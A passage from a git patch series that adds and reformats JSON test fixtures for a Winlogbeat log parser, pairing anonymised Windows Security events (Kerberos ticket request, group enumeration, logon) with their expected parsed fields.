\u00e0 laquelle l\u2019acc\u00e8s \u00e0 \u00e9t\u00e9 demand\u00e9.\\n\\nCet \u00e9v\u00e9nement peut \u00eatre associ\u00e9 \u00e0 des \u00e9v\u00e9nements de connexion Windows en comparant les champs GUID d\u2019ouverture de session de chaque \u00e9v\u00e9nement. L\u2019\u00e9v\u00e9nement de connexion se produit sur l\u2019ordinateur sur lequel l\u2019acc\u00e8s s\u2019est effectu\u00e9, qui souvent n\u2019est pas le m\u00eame ordinateur que le contr\u00f4leur de domaine qui a \u00e9mis le ticket de service.\\n\\nLes options de ticket, les types de chiffrement et les codes d\u2019\u00e9chec sont d\u00e9finis dans la RFC 4120.\",\"host\":{\"name\":\"HOST01.domain.priv\"},\"agent\":{\"name\":\"AGENT\",\"version\":\"8.11.1\",\"type\":\"winlogbeat\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\",\"id\":\"aaaaaaaa-bbbb-CCCC-DDDD-eeeeeeeeeeee\"},\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-A5BA-3E3B0328C30D}\",\"channel\":\"Security\",\"task\":\"Op\u00e9rations de ticket du service Kerberos\",\"computer_name\":\"HOST01.domain.priv\",\"keywords\":[\"Succ\u00e8s de l\u2019audit\"],\"opcode\":\"Informations\",\"event_data\":{\"TicketEncryptionType\":\"0x12\",\"TicketOptions\":\"0x40810000\",\"LogonGuid\":\"{12345678-ABCD-EF90-1234-123456ABCDEF}\",\"IpPort\":\"50754\",\"TargetDomainName\":\"DOMAIN.PRIV\",\"TargetUserName\":\"account@DOMAIN.PRIV\",\"ServiceSid\":\"S-1-2-3\",\"Status\":\"0x0\",\"TransmittedServices\":\"-\",\"IpAddress\":\"::ffff:1.2.3.4\",\"ServiceName\":\"SERVICE$\"},\"process\":{\"thread\":{\"id\":7992},\"pid\":560},\"event_id\":\"4769\",\"api\":\"wineventlog\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"record_id\":2476587153},\"@version\":\"1\"}",
+    "event": {
+      "action": "Op\u00e9rations de ticket du service Kerberos",
+      "code": "4769",
+      "kind": "event",
+      "module": "security",
+      "original": "Un ticket de service Kerberos a \u00e9t\u00e9 demand\u00e9.\n\nInformations sur le compte :\n\tNom du compte :\t\taccount@DOMAIN.PRIV\n\tDomaine du compte :\t\tDOMAIN.PRIV\n\tGUID d\u2019ouverture de session :\t\t{12345678-ABCD-EF90-1234-123456ABCDEF}\n\nInformations sur le service :\n\tNom du service :\t\tSERVICE$\n\tID du service :\t\tS-1-2-3\n\nInformations sur le r\u00e9seau :\n\tAdresse du client :\t\t::ffff:1.2.3.4\n\tPort client :\t\t50754\n\nInformations suppl\u00e9mentaires :\n\tOptions du ticket :\t\t0x40810000\n\tType de chiffrement du ticket :\t0x12\n\tCode d\u2019\u00e9chec :\t\t0x0\n\tServices en transit :\t-\n\nC\u2019et \u00e9v\u00e9nement est g\u00e9n\u00e9r\u00e9 \u00e0 chaque fois qu\u2019un acc\u00e8s est demand\u00e9 \u00e0 une ressource comme un ordinateur ou un service Windows. Le nom du service indique la ressource \u00e0 laquelle l\u2019acc\u00e8s \u00e0 \u00e9t\u00e9 demand\u00e9.\n\nCet \u00e9v\u00e9nement peut \u00eatre associ\u00e9 \u00e0 des \u00e9v\u00e9nements de connexion Windows en comparant les champs GUID d\u2019ouverture de session de chaque \u00e9v\u00e9nement. L\u2019\u00e9v\u00e9nement de connexion se produit sur l\u2019ordinateur sur lequel l\u2019acc\u00e8s s\u2019est effectu\u00e9, qui souvent n\u2019est pas le m\u00eame ordinateur que le contr\u00f4leur de domaine qui a \u00e9mis le ticket de service.\n\nLes options de ticket, les types de chiffrement et les codes d\u2019\u00e9chec sont d\u00e9finis dans la RFC 4120.",
+      "outcome": "success",
+      "provider": "Microsoft-Windows-Security-Auditing"
+    },
+    "@timestamp": "2024-11-12T09:17:02.856000Z",
+    "action": {
+      "id": 4769,
+      "outcome": "success",
+      "properties": {
+        "IpAddress": "::ffff:1.2.3.4",
+        "IpPort": "50754",
+        "LogonGuid": "{12345678-ABCD-EF90-1234-123456ABCDEF}",
+        "ServiceName": "SERVICE$",
+        "ServiceSid": "S-1-2-3",
+        "Status": "0x0",
+        "TargetDomainName": "DOMAIN.PRIV",
+        "TargetUserName": "account@DOMAIN.PRIV",
+        "TicketEncryptionType": "0x12",
+        "TicketOptions": "0x40810000",
+        "TransmittedServices": "-"
+      }
+    },
+    "agent": {
+      "ephemeral_id": "11111111-2222-3333-4444-555555555555",
+      "id": "aaaaaaaa-bbbb-CCCC-DDDD-eeeeeeeeeeee",
+      "name": "AGENT",
+      "type": "winlogbeat",
+      "version": "8.11.1"
+    },
+    "host": {
+      "name": "HOST01.domain.priv"
+    },
+    "log": {
+      "level": "information"
+    },
+    "related": {
+      "ip": [
+        "::ffff:102:304"
+      ],
+      "user": [
+        "account"
+      ]
+    },
+    "service": {
+      "name": "SERVICE$"
+    },
+    "source": {
+      "address": "::ffff:102:304",
+      "ip": "::ffff:102:304",
+      "port": 50754
+    },
+    "user": {
+      "domain": "DOMAIN.PRIV",
+      "name": "account",
+      "target": {
+        "domain": "DOMAIN.PRIV",
+        "name": "account@DOMAIN.PRIV"
+      }
+    },
+    "winlog": {
+      "api": "wineventlog",
+      "channel": "Security",
+      "computer_name": "HOST01.domain.priv",
+      "event_data": {
+        "StatusDescription": "KDC_ERR_NONE"
+      },
+      "event_id": "4769",
+      "keywords": [
+        "Succ\u00e8s de l\u2019audit"
+      ],
+      "opcode": "Informations",
+      "process": {
+        "pid": 560,
+        "thread": {
+          "id": 7992
+        }
+      },
+      "provider_guid": "{54849625-5478-4994-a5ba-3e3b0328c30d}",
+      "provider_name": "Microsoft-Windows-Security-Auditing",
+      "record_id": "2476587153",
+      "task": "Op\u00e9rations de ticket du service Kerberos"
+    }
+  }
+}
\ No newline at end of file
diff --git a/Beats/winlogbeat/tests/security_event_4798.json b/Beats/winlogbeat/tests/security_event_4798.json
new file mode 100644
index 000000000..b69049f3d
--- /dev/null
+++ b/Beats/winlogbeat/tests/security_event_4798.json
@@ -0,0 +1,114 @@
+{
+  "input": {
+    "sekoiaio": {
+      "intake": {
+        "dialect": "Elastic Winlogbeat",
+        "dialect_uuid": "c10307ea-5dd1-45c6-85aa-2a6a900df99b"
+      }
+    },
+    "message": "{\"@timestamp\":\"2024-11-12T08:25:34.741Z\",\"event\":{\"action\":\"User Account Management\",\"outcome\":\"success\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4798\",\"created\":\"2024-11-12T08:25:35.614Z\",\"kind\":\"event\",\"dataset\":\"system.security\",\"original\":\"A user's local group membership was enumerated.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACC0123$\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x3E7\\n\\nUser:\\n\\tSecurity ID:\\t\\tS-3-4-5\\n\\tAccount Name:\\t\\tGuest\\n\\tAccount Domain:\\t\\tACC0123\\n\\nProcess Information:\\n\\tProcess ID:\\t\\t0x123\\n\\tProcess Name:\\t\\tC:\\\\Program Files\\\\program.exe\"},\"message\":\"A user's local group membership was enumerated.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACC0123$\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x3E7\\n\\nUser:\\n\\tSecurity ID:\\t\\tS-3-4-5\\n\\tAccount Name:\\t\\tGuest\\n\\tAccount Domain:\\t\\tACC0123\\n\\nProcess Information:\\n\\tProcess ID:\\t\\t0x123\\n\\tProcess Name:\\t\\tC:\\\\Program Files\\\\program.exe\",\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"activity_id\":\"{11111111-2222-3333-4444-555555555555}\",\"keywords\":[\"Audit Success\"],\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"channel\":\"Security\",\"task\":\"User Account Management\",\"process\":{\"pid\":668,\"thread\":{\"id\":8860}},\"event_data\":{\"TargetSid\":\"S-3-4-5\",\"TargetUserName\":\"Guest\",\"SubjectDomainName\":\"DOMAIN\",\"CallerProcessName\":\"C:\\\\Program Files\\\\program.exe\",\"SubjectUserName\":\"ACC0123$\",\"TargetDomainName\":\"ACC0123\",\"SubjectLogonId\":\"0x3e7\",\"SubjectUserSid\":\"S-1-2-3\",\"CallerProcessId\":\"0x123\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"ACC0123.johndoe.com\",\"record_id\":1524672,\"event_id\":\"4798\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"ACC0123\",\"id\":\"aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee\",\"ephemeral_id\":\"12345678-90ab-cdef-1234-123456abcdef\"},\"tags\":[\"Windows\",\"beats_input_codec_plain_applied\"],\"host\":{\"hostname\":\"hostname\",\"architecture\":\"x86_64\",\"id\":\"12345678-90ef-abcd-1234-abcdef123456\",\"name\":\"hostname\",\"mac\":[\"00-11-22-33-44-55\"],\"os\":{\"kernel\":\"10.0.20348.169 (WinBuild.160101.0800)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2022 Standard\",\"build\":\"20348.169\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"1.2.3.4\"]}}"
+  },
+  "expected": {
+    "message": "{\"@timestamp\":\"2024-11-12T08:25:34.741Z\",\"event\":{\"action\":\"User Account Management\",\"outcome\":\"success\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4798\",\"created\":\"2024-11-12T08:25:35.614Z\",\"kind\":\"event\",\"dataset\":\"system.security\",\"original\":\"A user's local group membership was enumerated.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACC0123$\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x3E7\\n\\nUser:\\n\\tSecurity ID:\\t\\tS-3-4-5\\n\\tAccount Name:\\t\\tGuest\\n\\tAccount Domain:\\t\\tACC0123\\n\\nProcess Information:\\n\\tProcess ID:\\t\\t0x123\\n\\tProcess Name:\\t\\tC:\\\\Program Files\\\\program.exe\"},\"message\":\"A user's local group membership was enumerated.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACC0123$\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x3E7\\n\\nUser:\\n\\tSecurity ID:\\t\\tS-3-4-5\\n\\tAccount Name:\\t\\tGuest\\n\\tAccount Domain:\\t\\tACC0123\\n\\nProcess Information:\\n\\tProcess ID:\\t\\t0x123\\n\\tProcess Name:\\t\\tC:\\\\Program Files\\\\program.exe\",\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"activity_id\":\"{11111111-2222-3333-4444-555555555555}\",\"keywords\":[\"Audit Success\"],\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"channel\":\"Security\",\"task\":\"User Account Management\",\"process\":{\"pid\":668,\"thread\":{\"id\":8860}},\"event_data\":{\"TargetSid\":\"S-3-4-5\",\"TargetUserName\":\"Guest\",\"SubjectDomainName\":\"DOMAIN\",\"CallerProcessName\":\"C:\\\\Program Files\\\\program.exe\",\"SubjectUserName\":\"ACC0123$\",\"TargetDomainName\":\"ACC0123\",\"SubjectLogonId\":\"0x3e7\",\"SubjectUserSid\":\"S-1-2-3\",\"CallerProcessId\":\"0x123\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"ACC0123.johndoe.com\",\"record_id\":1524672,\"event_id\":\"4798\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"ACC0123\",\"id\":\"aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee\",\"ephemeral_id\":\"12345678-90ab-cdef-1234-123456abcdef\"},\"tags\":[\"Windows\",\"beats_input_codec_plain_applied\"],\"host\":{\"hostname\":\"hostname\",\"architecture\":\"x86_64\",\"id\":\"12345678-90ef-abcd-1234-abcdef123456\",\"name\":\"hostname\",\"mac\":[\"00-11-22-33-44-55\"],\"os\":{\"kernel\":\"10.0.20348.169 (WinBuild.160101.0800)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2022 Standard\",\"build\":\"20348.169\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"1.2.3.4\"]}}",
+    "event": {
+      "action": "User Account Management",
+      "code": "4798",
+      "kind": "event",
+      "module": "security",
+      "original": "A user's local group membership was enumerated.\n\nSubject:\n\tSecurity ID:\t\tS-1-2-3\n\tAccount Name:\t\tACC0123$\n\tAccount Domain:\t\tDOMAIN\n\tLogon ID:\t\t0x3E7\n\nUser:\n\tSecurity ID:\t\tS-3-4-5\n\tAccount Name:\t\tGuest\n\tAccount Domain:\t\tACC0123\n\nProcess Information:\n\tProcess ID:\t\t0x123\n\tProcess Name:\t\tC:\\Program Files\\program.exe",
+      "outcome": "success",
+      "provider": "Microsoft-Windows-Security-Auditing"
+    },
+    "@timestamp": "2024-11-12T08:25:34.741000Z",
+    "action": {
+      "id": 4798,
+      "outcome": "success",
+      "properties": {
+        "CallerProcessId": "0x123",
+        "CallerProcessName": "C:\\Program Files\\program.exe",
+        "SubjectDomainName": "DOMAIN",
+        "SubjectLogonId": "0x3e7",
+        "SubjectUserName": "ACC0123$",
+        "SubjectUserSid": "S-1-2-3",
+        "TargetDomainName": "ACC0123",
+        "TargetSid": "S-3-4-5",
+        "TargetUserName": "Guest"
+      }
+    },
+    "agent": {
+      "ephemeral_id": "12345678-90ab-cdef-1234-123456abcdef",
+      "id": "aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee",
+      "name": "ACC0123",
+      "type": "filebeat",
+      "version": "8.14.1"
+    },
+    "host": {
+      "architecture": "x86_64",
+      "hostname": "hostname",
+      "id": "12345678-90ef-abcd-1234-abcdef123456",
+      "ip": [
+        "1.2.3.4"
+      ],
+      "mac": [
+        "00-11-22-33-44-55"
+      ],
+      "name": "hostname",
+      "os": {
+        "build": "20348.169",
+        "family": "windows",
+        "kernel": "10.0.20348.169 (WinBuild.160101.0800)",
+        "name": "Windows Server 2022 Standard",
+        "platform": "windows",
+        "type": "windows",
+        "version": "10.0"
+      }
+    },
+    "log": {
+      "level": "information"
+    },
+    "related": {
+      "hosts": [
+        "hostname"
+      ],
+      "ip": [
+        "1.2.3.4"
+      ],
+      "user": [
+        "ACC0123"
+      ]
+    },
+    "user": {
+      "domain": "DOMAIN",
+      "id": "S-1-2-3",
+      "name": "ACC0123",
+      "target": {
+        "domain": "ACC0123",
+        "name": "Guest"
+      }
+    },
+    "winlog": {
+      "activity_id": "{11111111-2222-3333-4444-555555555555}",
+      "api": "wineventlog",
+      "channel": "Security",
+      "computer_name": "ACC0123.johndoe.com",
+      "event_id": "4798",
+      "keywords": [
+        "Audit Success"
+      ],
+      "logon": {
+        "id": "0x3e7"
+      },
+      "opcode": "Info",
+      "process": {
+        "pid": 668,
+        "thread": {
+          "id": 8860
+        }
+      },
+      "provider_guid": "{54849625-5478-4994-a5ba-3e3b0328c30d}",
+      "provider_name": "Microsoft-Windows-Security-Auditing",
+      "record_id": "1524672",
+      "task": "User Account Management"
+    }
+  }
+}
\ No newline at end of file
diff --git a/Beats/winlogbeat/tests/security_event_5140.json b/Beats/winlogbeat/tests/security_event_5140.json
index cde1d5c3c..8413484f9 100644
--- a/Beats/winlogbeat/tests/security_event_5140.json
+++ b/Beats/winlogbeat/tests/security_event_5140.json
@@ -93,11 +93,6 @@
       "api": "wineventlog",
       "channel": "Security",
       "computer_name": "HOST01.company.test",
-      "event_data": {
-        "AccessMaskDescription": [
-          "Create Child"
-        ]
-      },
       "event_id": "5140",
       "keywords": [
         "Audit Success"
diff --git a/Beats/winlogbeat/tests/security_event_5145.json b/Beats/winlogbeat/tests/security_event_5145.json
index 99a17d54f..ec1e78d54 100644
--- a/Beats/winlogbeat/tests/security_event_5145.json
+++ b/Beats/winlogbeat/tests/security_event_5145.json
@@ -96,13 +96,6 @@
       "api": "wineventlog",
       "channel": "Security",
       "computer_name": "host01.company.test",
-      "event_data": {
-        "AccessMaskDescription": [
-          "List Object",
-          "READ_CONTROL",
-          "SYNCHRONIZE"
-        ]
-      },
       "event_id": "5145",
       "keywords": [
         "Audit Success"

From ce15f8192df09ce7a518c56479354e2ad1ffe28e Mon Sep 17 00:00:00 2001
From: LenaigKaliou <lenaigk@protonmail.com>
Date: Thu, 14 Nov 2024 11:43:35 +0100
Subject: [PATCH 228/317] fixed linting issues

---
 Beats/winlogbeat/tests/security_event_4624.json | 4 ++--
 Beats/winlogbeat/tests/security_event_4625.json | 4 ++--
 Beats/winlogbeat/tests/security_event_4634.json | 4 ++--
 Beats/winlogbeat/tests/security_event_4662.json | 4 ++--
 Beats/winlogbeat/tests/security_event_4672.json | 4 ++--
 Beats/winlogbeat/tests/security_event_4689.json | 4 ++--
 Beats/winlogbeat/tests/security_event_4720.json | 4 ++--
 Beats/winlogbeat/tests/security_event_4722.json | 4 ++--
 Beats/winlogbeat/tests/security_event_4723.json | 4 ++--
 Beats/winlogbeat/tests/security_event_4725.json | 4 ++--
 Beats/winlogbeat/tests/security_event_4726.json | 4 ++--
 Beats/winlogbeat/tests/security_event_4768.json | 4 ++--
 Beats/winlogbeat/tests/security_event_4769.json | 4 ++--
 Beats/winlogbeat/tests/security_event_4798.json | 4 ++--
 14 files changed, 28 insertions(+), 28 deletions(-)

diff --git a/Beats/winlogbeat/tests/security_event_4624.json b/Beats/winlogbeat/tests/security_event_4624.json
index 9e8cdfb26..fe8a200a5 100644
--- a/Beats/winlogbeat/tests/security_event_4624.json
+++ b/Beats/winlogbeat/tests/security_event_4624.json
@@ -1,12 +1,12 @@
 {
   "input": {
+    "message": "{\"agent\":{\"version\":\"7.0.0\",\"hostname\":\"hostname\",\"id\":\"abcd1234-abcd-1234-ef56-abcdef123456\",\"ephemeral_id\":\"12345678-1234-5678-9012-123456789012\",\"type\":\"winlogbeat\"},\"host\":{\"hostname\":\"hostname\",\"os\":{\"version\":\"10.0\",\"build\":\"17763.6414\",\"family\":\"windows\",\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"platform\":\"windows\",\"name\":\"Windows Server 2019 Datacenter\"},\"id\":\"abcdefab-1234-5678-9012-abcdefabcdef\",\"name\":\"hostname\",\"architecture\":\"x86_64\"},\"type\":\"winlogbeat\",\"ecs\":{\"version\":\"1.0.0\"},\"event\":{\"created\":\"2024-11-12T08:41:07.164Z\",\"action\":\"Logon\",\"code\":4624,\"kind\":\"event\"},\"tags\":[\"beats_input_codec_plain_applied\"],\"winlog\":{\"keywords\":[\"Audit Success\"],\"api\":\"wineventlog\",\"version\":2,\"process\":{\"pid\":752,\"thread\":{\"id\":7960}},\"record_id\":1170100815,\"event_data\":{\"TargetLinkedLogonId\":\"0x0\",\"IpPort\":\"29051\",\"TargetOutboundUserName\":\"-\",\"ImpersonationLevel\":\"%%1833\",\"TargetDomainName\":\"DOMAIN\",\"TargetOutboundDomainName\":\"-\",\"IpAddress\":\"1.2.3.4\",\"LogonProcessName\":\"Process \",\"WorkstationName\":\"WS-USER-01\",\"LmPackageName\":\"-\",\"SubjectUserSid\":\"S-1-2-3\",\"ProcessId\":\"0x2f0\",\"VirtualAccount\":\"%%1843\",\"SubjectLogonId\":\"0x3e7\",\"KeyLength\":\"0\",\"RestrictedAdminMode\":\"-\",\"TargetUserSid\":\"S-4-5-6\",\"ElevatedToken\":\"%%1843\",\"SubjectUserName\":\"WS-USER-01$\",\"LogonGuid\":\"{00000000-0000-0000-0000-000000000000}\",\"TransmittedServices\":\"-\",\"LogonType\":\"3\",\"SubjectDomainName\":\"DOMAIN\",\"TargetUserName\":\"target_user\",\"ProcessName\":\"C:\\\\Windows\\\\System32\\\\executable.exe\",\"TargetLogonId\":\"0xfcebb74a\",\"AuthenticationPackageName\":\"MICROSOFT_AUTHENTICATION_PACKAGE_V1_0\"},\"event_id\":4624,\"computer_name\":\"hostname.company.com\",\"channel\":\"Security\",\"task\":\"Logon\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"opcode\":\"Info\"},\"log\":{\"level\":\"information\"},\"message\":\"An account was successfully logged on.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tWS-USER-01$\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x3E7\\n\\nLogon Information:\\n\\tLogon Type:\\t\\t3\\n\\tRestricted Admin Mode:\\t-\\n\\tVirtual Account:\\t\\tNo\\n\\tElevated Token:\\t\\tNo\\n\\nImpersonation Level:\\t\\tImpersonation\\n\\nNew Logon:\\n\\tSecurity ID:\\t\\tS-4-5-6\\n\\tAccount Name:\\t\\ttarget_user\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0xFCEBB74A\\n\\tLinked Logon ID:\\t\\t0x0\\n\\tNetwork Account Name:\\t-\\n\\tNetwork Account Domain:\\t-\\n\\tLogon GUID:\\t\\t{00000000-0000-0000-0000-000000000000}\\n\\nProcess Information:\\n\\tProcess ID:\\t\\t0x2f0\\n\\tProcess Name:\\t\\tC:\\\\Windows\\\\System32\\\\executable.exe\\n\\nNetwork Information:\\n\\tWorkstation Name:\\tWS-USER-01\\n\\tSource Network Address:\\t1.2.3.4\\n\\tSource Port:\\t\\t29051\\n\\nDetailed Authentication Information:\\n\\tLogon Process:\\t\\tProcess \\n\\tAuthentication Package:\\tMICROSOFT_AUTHENTICATION_PACKAGE_V1_0\\n\\tTransited Services:\\t-\\n\\tPackage Name (NTLM only):\\t-\\n\\tKey Length:\\t\\t0\\n\\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\\n\\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\\n\\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\\n\\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\\n\\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\\n\\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\\n\\nThe authentication information fields provide detailed information about this specific logon request.\\n\\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\\n\\t- Transited services indicate which intermediate services have participated in this logon request.\\n\\t- Package name indicates which sub-protocol was used among the NTLM protocols.\\n\\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.\",\"@version\":\"1\",\"@timestamp\":\"2024-11-12T08:41:05.803Z\"}",
     "sekoiaio": {
       "intake": {
         "dialect": "Elastic Winlogbeat",
         "dialect_uuid": "c10307ea-5dd1-45c6-85aa-2a6a900df99b"
       }
-    },
-    "message": "{\"agent\":{\"version\":\"7.0.0\",\"hostname\":\"hostname\",\"id\":\"abcd1234-abcd-1234-ef56-abcdef123456\",\"ephemeral_id\":\"12345678-1234-5678-9012-123456789012\",\"type\":\"winlogbeat\"},\"host\":{\"hostname\":\"hostname\",\"os\":{\"version\":\"10.0\",\"build\":\"17763.6414\",\"family\":\"windows\",\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"platform\":\"windows\",\"name\":\"Windows Server 2019 Datacenter\"},\"id\":\"abcdefab-1234-5678-9012-abcdefabcdef\",\"name\":\"hostname\",\"architecture\":\"x86_64\"},\"type\":\"winlogbeat\",\"ecs\":{\"version\":\"1.0.0\"},\"event\":{\"created\":\"2024-11-12T08:41:07.164Z\",\"action\":\"Logon\",\"code\":4624,\"kind\":\"event\"},\"tags\":[\"beats_input_codec_plain_applied\"],\"winlog\":{\"keywords\":[\"Audit Success\"],\"api\":\"wineventlog\",\"version\":2,\"process\":{\"pid\":752,\"thread\":{\"id\":7960}},\"record_id\":1170100815,\"event_data\":{\"TargetLinkedLogonId\":\"0x0\",\"IpPort\":\"29051\",\"TargetOutboundUserName\":\"-\",\"ImpersonationLevel\":\"%%1833\",\"TargetDomainName\":\"DOMAIN\",\"TargetOutboundDomainName\":\"-\",\"IpAddress\":\"1.2.3.4\",\"LogonProcessName\":\"Process \",\"WorkstationName\":\"WS-USER-01\",\"LmPackageName\":\"-\",\"SubjectUserSid\":\"S-1-2-3\",\"ProcessId\":\"0x2f0\",\"VirtualAccount\":\"%%1843\",\"SubjectLogonId\":\"0x3e7\",\"KeyLength\":\"0\",\"RestrictedAdminMode\":\"-\",\"TargetUserSid\":\"S-4-5-6\",\"ElevatedToken\":\"%%1843\",\"SubjectUserName\":\"WS-USER-01$\",\"LogonGuid\":\"{00000000-0000-0000-0000-000000000000}\",\"TransmittedServices\":\"-\",\"LogonType\":\"3\",\"SubjectDomainName\":\"DOMAIN\",\"TargetUserName\":\"target_user\",\"ProcessName\":\"C:\\\\Windows\\\\System32\\\\executable.exe\",\"TargetLogonId\":\"0xfcebb74a\",\"AuthenticationPackageName\":\"MICROSOFT_AUTHENTICATION_PACKAGE_V1_0\"},\"event_id\":4624,\"computer_name\":\"hostname.company.com\",\"channel\":\"Security\",\"task\":\"Logon\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"opcode\":\"Info\"},\"log\":{\"level\":\"information\"},\"message\":\"An account was successfully logged on.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tWS-USER-01$\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x3E7\\n\\nLogon Information:\\n\\tLogon Type:\\t\\t3\\n\\tRestricted Admin Mode:\\t-\\n\\tVirtual Account:\\t\\tNo\\n\\tElevated Token:\\t\\tNo\\n\\nImpersonation Level:\\t\\tImpersonation\\n\\nNew Logon:\\n\\tSecurity ID:\\t\\tS-4-5-6\\n\\tAccount Name:\\t\\ttarget_user\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0xFCEBB74A\\n\\tLinked Logon ID:\\t\\t0x0\\n\\tNetwork Account Name:\\t-\\n\\tNetwork Account Domain:\\t-\\n\\tLogon GUID:\\t\\t{00000000-0000-0000-0000-000000000000}\\n\\nProcess Information:\\n\\tProcess ID:\\t\\t0x2f0\\n\\tProcess Name:\\t\\tC:\\\\Windows\\\\System32\\\\executable.exe\\n\\nNetwork Information:\\n\\tWorkstation Name:\\tWS-USER-01\\n\\tSource Network Address:\\t1.2.3.4\\n\\tSource Port:\\t\\t29051\\n\\nDetailed Authentication Information:\\n\\tLogon Process:\\t\\tProcess \\n\\tAuthentication Package:\\tMICROSOFT_AUTHENTICATION_PACKAGE_V1_0\\n\\tTransited Services:\\t-\\n\\tPackage Name (NTLM only):\\t-\\n\\tKey Length:\\t\\t0\\n\\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\\n\\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\\n\\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\\n\\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\\n\\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\\n\\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\\n\\nThe authentication information fields provide detailed information about this specific logon request.\\n\\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\\n\\t- Transited services indicate which intermediate services have participated in this logon request.\\n\\t- Package name indicates which sub-protocol was used among the NTLM protocols.\\n\\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.\",\"@version\":\"1\",\"@timestamp\":\"2024-11-12T08:41:05.803Z\"}"
+    }
   },
   "expected": {
